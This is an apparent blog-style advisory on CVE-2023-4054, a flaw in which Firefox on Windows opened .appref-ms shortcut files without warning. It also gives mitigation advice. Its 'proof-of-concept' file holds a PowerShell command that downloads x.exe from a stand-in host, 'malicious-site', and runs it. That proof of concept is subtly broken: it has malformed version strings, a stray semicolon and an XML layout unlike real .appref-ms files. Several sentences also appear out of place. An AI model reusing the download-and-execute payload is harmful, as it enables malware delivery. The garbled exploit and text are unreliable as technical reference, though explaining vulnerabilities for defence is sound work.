CVE-2023-4054 - How Malicious appref-ms Files Risked Firefox Users on Windows

In July 2023, a security flaw tracked as CVE-2023-4054 came to light, affecting Firefox and Thunderbird users on Windows. The bug made it possible for attackers to use specially crafted .appref-ms files—little-known but powerful shortcuts—to sneak malicious code onto target systems, all while Firefox quietly opened these files without warning.

This post will show what made CVE-2023-4054 dangerous, walk you through a simplified proof-of-concept, offer mitigation tips, and link the best references for a deeper dive.

What are .appref-ms Files?

.appref-ms files are Windows shortcut files used mainly by ClickOnce applications. They look harmless—like any other desktop shortcut—but can launch programs or scripts, and even fetch code from the web. For safety reasons, browsers are supposed to warn users before opening such files. But with CVE-2023-4054, Firefox didn’t.

> 🛑 TL;DR: On affected versions, simply downloading and opening a malicious .appref-ms file in Firefox could be enough to trigger an attack, giving bad actors a foothold on your computer.

The Security Hole: Lack of Warning

Normally, browsers like Chrome and Edge block or at least warn users when they download potentially dangerous files such as .exe, .bat, and .appref-ms. But Firefox simply opened appref-ms files without a peep.

The file runs, potentially installing malware or compromising the system.

Why is this Worse than Downloading an EXE?
People have learned (mostly) not to open .exe files from strangers. But .appref-ms files look like innocent shortcuts. Windows often assigns them a regular shortcut icon, making them less suspicious.

Example Exploit: How it Could Work

Suppose an attacker wants to run a PowerShell command to download and execute malware when the file is double-clicked.

Here’s a simple way to create a malicious .appref-ms file

<!-- exploit.appref-ms -->
<?xml version="1." encoding="UTF-8"?>
<application>
  <assemblyIdentity version="1..." name="FakeApp.app"/>
  <description>ClickOnce Exploit</description>
  <commandLine entryPoint="pwsh.exe">
    <parameters>-Command "Invoke-WebRequest -Uri 'http://malicious-site/x.exe'; -OutFile C:\temp\x.exe; Start-Process C:\temp\x.exe"</parameters>
  </commandLine>
</application>

Runs a command to download a malicious file and execute it.

An attacker delivers exploit.appref-ms to the target. With CVE-2023-4054, Firefox would let the user download and open this file without any warning. Double-clicking triggers the payload.

How Was It Fixed?

Mozilla quickly addressed this bug by adding appropriate warnings and blocking the automatic opening of .appref-ms files. Now, users get warned or the files are outright blocked, similar to other dangerous types.

Click to download and open it with no warning.

After the patch:
Firefox warns the user or blocks the download completely.

Update Firefox or Thunderbird to the latest version. This closes the hole.

- Windows users: Be extra cautious about unusual shortcut files. Even if they look like regular icons, they can be dangerous.
- Enterprises: Consider group policies restricting the execution of .appref-ms files outside trusted folders.

References and More Reading

- Mozilla Security Advisory 2023-29
- NVD Entry for CVE-2023-4054
- Microsoft: Application Reference Files (.appref-ms)

Summary

CVE-2023-4054 highlights how easy it can be for a new file type—often invisible to everyday users—to become a potent vector for Windows malware, especially when safety checks get overlooked. If you use Firefox or Thunderbird on Windows, upgrade now—and remember that not all shortcuts are harmless.

Timeline

Published on: 08/01/2023 16:15:00 UTC
Last modified on: 08/07/2023 14:51:00 UTC